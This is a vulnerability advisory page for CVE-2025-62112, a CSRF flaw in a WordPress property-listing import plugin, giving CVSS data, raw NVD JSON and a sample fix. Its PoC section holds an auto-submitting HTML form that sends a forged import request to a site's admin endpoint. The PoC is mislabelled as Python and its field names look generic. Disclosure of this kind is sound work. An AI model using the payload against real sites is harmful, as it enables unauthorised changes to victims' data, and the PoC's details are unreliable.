Security Vulnerability Report
中文
CVE-2025-62112 CVSS 4.3 MEDIUM

CVE-2025-62112

Published: 2025-12-30 17:15:43
Last Modified: 2026-04-23 15:34:34

Description

Cross-Site Request Forgery (CSRF) vulnerability in Merv Barrett Import into Easy Property Listings easy-property-listings-xml-csv-import allows Cross Site Request Forgery.This issue affects Import into Easy Property Listings: from n/a through <= 2.2.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

easy-property-listings-xml-csv-import <= 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62112 --> <!-- Target: WordPress site with easy-property-listings-xml-csv-import plugin <= 2.2.1 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62112</title> </head> <body> <h1>Malicious Import Request</h1> <p>This PoC demonstrates the CSRF vulnerability in easy-property-listings-xml-csv-import plugin.</p> <!-- Auto-submit form simulating malicious CSV/XML import --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin.php?page=epl-xml-csv-import" method="POST" enctype="multipart/form-data"> <input type="hidden" name="epl_import_type" value="csv"> <input type="hidden" name="epl_import_data" value="malicious,data,injection"> <input type="hidden" name="epl_import_action" value="import"> <!-- Missing CSRF token - this is the vulnerability --> </form> <script> // Auto-submit on page load document.getElementById('csrfForm').submit(); console.log('Malicious request sent!'); </script> <p>If you see this message, the attack may have been executed.</p> </body> </html> <!-- Mitigation: Add CSRF token verification in plugin code --> <!-- Example fix for developers: if (!wp_verify_nonce($_POST['epl_csrf_token'], 'epl_import_nonce')) { wp_die('Security check failed'); } -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62112", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:42.547", "lastModified": "2026-04-23T15:34:33.857", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Merv Barrett Import into Easy Property Listings easy-property-listings-xml-csv-import allows Cross Site Request Forgery.This issue affects Import into Easy Property Listings: from n/a through <= 2.2.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Merv Barrett Import into Easy Property Listings permite la falsificación de petición en sitios cruzados. Este problema afecta a Import into Easy Property Listings: desde n/a hasta 2.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-property-listings-xml-csv-import/vulnerability/wordpress-import-into-easy-property-listings-plugin-2-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}